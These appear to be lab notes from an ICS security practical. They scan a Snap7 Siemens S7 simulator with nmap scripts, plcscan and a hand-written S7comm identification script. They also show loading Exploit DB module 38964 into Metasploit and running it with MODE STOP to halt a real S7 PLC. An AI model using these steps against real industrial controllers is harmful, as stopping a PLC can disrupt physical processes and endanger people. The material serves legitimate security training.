05-practical_2

Note imported from Inbox during bulk consolidation.

Practical - part 2

Starting the Siemens S7 simulator - Snap7

On the Ubuntu VM, start Python with: python3

Then run the following code:

import snap7
s7 = snap7.server.Server()   # python-snap7 wrapper around the Snap7 server library
s7.create()                  # allocate the native server object
s7.start()                   # begin listening for S7comm (ISO-on-TCP) clients
s7.get_status()              # returns (server status, CPU status, connected client count)

The method is get_status(), all lowercase. Check the port in the log line that start() prints: recent python-snap7 releases bind TCP 1102 by default rather than the standard S7 port 102 that the scans below target, so pass 102 as the port argument to start() (binding a port below 1024 requires root).

Now switch to the Kali VM. We know the Ubuntu host is 10.1.0.11, so we won't go through the steps to discover it with netdiscover and nmap. For reference the commands are:
sudo netdiscover -r 10.1.0.0/24
sudo nmap 10.1.0.11 -Pn -p 1-65535
(-Pn skips host discovery, which matters because PLCs and hardened hosts often don't answer ping; without it nmap may report the host as down.)

Nmap NSE scripts

Look at port 102 (ISO-TSAP, the port S7comm runs on) specifically, but first find the nmap scripts relevant to S7:
find /usr/share/nmap/ -name 's7*.nse'
(Quote the pattern so the shell does not expand the glob against the current directory before find sees it.)

This gives the following two files:

  • /usr/share/nmap/scripts/s7-info.nse
  • /usr/share/nmap/scripts/s7-enumerate.nse

Now scan port 102 using the info script
sudo nmap 10.1.0.11 -Pn -p 102 --script s7-info.nse

Now scan port 102 using the enumerate script
sudo nmap 10.1.0.11 -Pn -p 102 --script s7-enumerate.nse

plcscan

Navigate to the plcscan folder:
cd ~/gits/plcscan

Run plcscan against the host (it is Python 2 only, and it probes both S7comm on 102 and Modbus on 502, so expect no Modbus answer from the simulator):
sudo python2 plcscan.py 10.1.0.11
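What s7-info.nse and plcscan actually do on port 102 is a short, unauthenticated S7comm exchange: a COTP connection request to the CPU's TSAP, a Setup Communication job, and a "Read SZL" userdata request for the component identification list (SZL 0x001C). The following is an added example, not code from these notes, from nmap or from plcscan: it builds those three frames by hand, parses the reply the way the scanners do, and can run the same exchange live against the Snap7 VM. Frame layouts follow the S7comm protocol as Wireshark dissects it; the SAMPLE_001C response and its strings are constructed for the offline demo, not captured from a PLC.

```python
# Added example (not from the notes, nmap or plcscan): the exchange s7-info.nse and
# plcscan perform on TCP/102, hand-rolled so the byte layout is visible. Frame layouts
# follow the S7comm protocol as Wireshark dissects it; SAMPLE_001C and its strings are
# constructed for the offline demo, not captured from a PLC.
import socket
import struct

COTP_DT = bytes.fromhex("02f080")  # COTP Data TPDU: length 2, type DT, last fragment
# Record indexes in SZL 0x001C (component identification) that s7-info.nse prints
SZL_001C_FIELDS = {1: "system_name", 2: "module_type", 3: "plant_id",
                   4: "copyright", 5: "serial_number"}

def tpkt(payload: bytes) -> bytes:
    """Wrap an ISO-on-TCP payload in a TPKT header (version 3, 16-bit total length)."""
    return struct.pack(">BBH", 3, 0, 4 + len(payload)) + payload

def cotp_connect_request(rack: int = 0, slot: int = 2) -> bytes:
    """COTP CR with source TSAP 01.00 and destination TSAP 01.<rack<<5|slot>;
    rack 0 / slot 2 (the S7-300 CPU slot) is what s7-info.nse uses."""
    return tpkt(bytes([0x11, 0xE0, 0, 0, 0, 0x14, 0])          # LI, CR, dst ref, src ref, class 0
                + b"\xc1\x02\x01\x00"                          # source TSAP
                + b"\xc2\x02" + bytes([1, (rack << 5) | slot])  # destination TSAP
                + b"\xc0\x01\x0a")                             # TPDU size 2^10

def s7_setup_communication(pdu_ref: int = 0) -> bytes:
    """S7 Job 'Setup communication' (0xF0): one parallel job each way, 480-byte PDU."""
    header = struct.pack(">BBHHHH", 0x32, 0x01, 0, pdu_ref, 8, 0)
    return tpkt(COTP_DT + header + struct.pack(">BBHHH", 0xF0, 0, 1, 1, 480))

def s7_read_szl(szl_id: int, index: int = 0, pdu_ref: int = 0) -> bytes:
    """S7 Userdata request 'Read SZL' (CPU functions group 4, subfunction 1)."""
    header = struct.pack(">BBHHHH", 0x32, 0x07, 0, pdu_ref, 8, 8)
    param = bytes.fromhex("000112") + bytes([0x04, 0x11, 0x44, 0x01, 0x00])
    data = bytes([0xFF, 0x09]) + struct.pack(">HHH", 4, szl_id, index)
    return tpkt(COTP_DT + header + param + data)

def s7_szl_response(szl_id: int, records: dict, rec_len: int, pdu_ref: int = 0) -> bytes:
    """Server side: a 'Read SZL' response with {index: payload} records, each NUL-padded
    to rec_len (34 bytes for SZL 0x001C). Used here to build the offline sample."""
    body = b"".join(struct.pack(">H", i) + v.ljust(rec_len - 2, b"\x00")
                    for i, v in records.items())
    szl = struct.pack(">HHHH", szl_id, 0, rec_len, len(records)) + body
    data = bytes([0xFF, 0x09]) + struct.pack(">H", len(szl)) + szl
    param = bytes.fromhex("000112") + bytes([0x08, 0x12, 0x84, 0x01, 0, 0, 0, 0, 0])
    header = struct.pack(">BBHHHH", 0x32, 0x07, 0, pdu_ref, len(param), len(data))
    return tpkt(COTP_DT + header + param + data)

def parse_szl_response(frame: bytes):
    """Parse one TPKT frame holding a 'Read SZL' response into (szl_id, {index: raw record})."""
    if frame[0] != 3 or len(frame) != struct.unpack(">H", frame[2:4])[0]:
        raise ValueError("not a complete TPKT frame")
    s7 = frame[7:]                                           # skip TPKT (4) and COTP DT (3)
    proto, rosctr, _, _, param_len, data_len = struct.unpack(">BBHHHH", s7[:10])
    if proto != 0x32 or rosctr != 0x07:
        raise ValueError("not an S7 Userdata PDU")
    param = s7[10:10 + param_len]
    data = s7[10 + param_len:10 + param_len + data_len]
    if param_len == 12 and param[10:12] != b"\x00\x00":      # error code field of a response
        raise ValueError("CPU returned S7 error 0x%s" % param[10:12].hex())
    if data[0] != 0xFF:                                      # return code; e.g. 0x0A = no such SZL
        raise ValueError("SZL read failed, return code 0x%02x" % data[0])
    szl_id, _, rec_len, count = struct.unpack(">HHHH", data[4:12])
    records = {}
    for n in range(count):
        rec = data[12 + n * rec_len:12 + (n + 1) * rec_len]
        records[struct.unpack(">H", rec[:2])[0]] = rec[2:]
    return szl_id, records

def cpu_identity(records: dict) -> dict:
    """Turn SZL 0x001C records into the fields nmap prints (NUL-padded ASCII strings)."""
    return {name: records[i].rstrip(b"\x00").decode("ascii", "replace")
            for i, name in SZL_001C_FIELDS.items() if i in records}

def s7_identify(host: str, port: int = 102, rack: int = 0, slot: int = 2) -> dict:
    """The live three-step exchange, e.g. s7_identify("10.1.0.11") against the Snap7 VM."""
    def recv_tpkt(sock):
        buf = b""
        while len(buf) < 4 or len(buf) < struct.unpack(">H", buf[2:4])[0]:
            chunk = sock.recv(4096)
            if not chunk:
                raise ConnectionError("peer closed the connection")
            buf += chunk
        return buf
    with socket.create_connection((host, port), timeout=3) as sock:
        sock.sendall(cotp_connect_request(rack, slot))
        if recv_tpkt(sock)[5] != 0xD0:                       # expect COTP CC; DR = refused
            raise ConnectionError("COTP connect refused: wrong rack/slot TSAP?")
        sock.sendall(s7_setup_communication())
        recv_tpkt(sock)
        sock.sendall(s7_read_szl(0x001C, pdu_ref=1))
        return cpu_identity(parse_szl_response(recv_tpkt(sock))[1])

# Constructed sample of a CPU's answer to s7_read_szl(0x001C); the strings are made up.
SAMPLE_001C = s7_szl_response(0x001C, {1: b"SIMATIC 300(1)", 2: b"CPU 315-2 PN/DP",
                                        4: b"Original Siemens Equipment",
                                        5: b"S C-DEMO00000001"}, rec_len=34)
```

Two things this makes visible that the scanner output hides: nothing in the exchange is authenticated (the destination TSAP is the only "credential", and it is just rack and slot), and a COTP Disconnect Request instead of a Connect Confirm usually means the wrong slot rather than a closed port. Passing the Snap7 VM's actual listening port to s7_identify() is the offline check that the simulator is where the scans expect it.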

Metasploit and Exploit DB

Start MSF with sudo msfconsole.

Once started, run search Siemens to list the modules related to Siemens.

Search Exploit DB for every entry with Siemens in the name: searchsploit Siemens

use <number> selects one result from the last msf search.

Adding an external exploit (an Exploit DB entry that MSF does not ship) to msf:
open the file system as root.

  • The Exploit DB files are kept under /usr/share/exploitdb/. Copy /usr/share/exploitdb/exploits/hardware/remote/38964.rb into /usr/share/metasploit-framework/modules/exploits/hardware/remote/38964.rb. The hardware and remote folders have to be created first. (Alternatively, put it under ~/.msf4/modules/exploits/hardware/remote/, which MSF also loads, and run reload_all inside msfconsole instead of restarting.)

Restart msf.

Once restarted the copied module is available with use exploit/hardware/remote/38964 (the .rb extension is not part of the module name).

Now set the target parameters:
setg RHOSTS 10.1.0.11 sets RHOSTS globally, so it carries over to other modules in the session.

set MODE STOP and start the module with run.

This only has an effect on real S7 PLCs; it has no effect on the Snap7 simulation.

SiemensScan

Navigate to ICSSecurityScripts with cd ~/gits/ICSSecurityScripts, then run
sudo python3 SiemensScan.py

This discovers S7 devices on the network, but it does not find the Snap7 simulation: Snap7 only emulates the S7comm server on TCP/102, whereas SiemensScan relies on layer-2 PROFINET DCP identify requests on the local Ethernet segment, which the simulator never answers.


Next Section -> Real S7 Hardware
